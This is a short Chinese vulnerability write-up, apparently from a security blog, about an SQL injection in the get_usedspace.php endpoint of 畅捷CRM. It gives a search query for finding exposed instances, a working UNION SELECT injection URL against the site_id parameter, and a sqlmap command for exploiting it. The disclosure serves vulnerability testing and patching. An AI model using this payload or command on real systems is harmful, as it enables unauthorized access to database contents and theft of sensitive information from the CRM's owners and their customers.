畅捷CRM get_usedspace.php SQL注入漏洞

漏洞描述

畅捷CRM get_usedspace.php存在SQL漏洞,通过漏洞可获取数据库敏感信息。

漏洞影响

畅捷CRM

网络测绘

title=”畅捷CRM”

漏洞复现

登录页面

20240409103305925-png (3)

验证POC

/webservice/get_usedspace.php?site_id=-1159 UNION ALL SELECT CONCAT(0x76756c6e,0x76756c6e,0x76756c6e)--

20240409103409915-png (4)

使用Sqlmap验证漏洞

sqlmap -u "http://xxx.xxx.xxx.xxx:8000/webservice/get_usedspace.php?site_id=1" -p site_id

20240409103544298-png (5)

© 版权声明
THE END
喜欢就支持一下吧
点赞0 分享
评论 抢沙发

请登录后发表评论

    暂无评论内容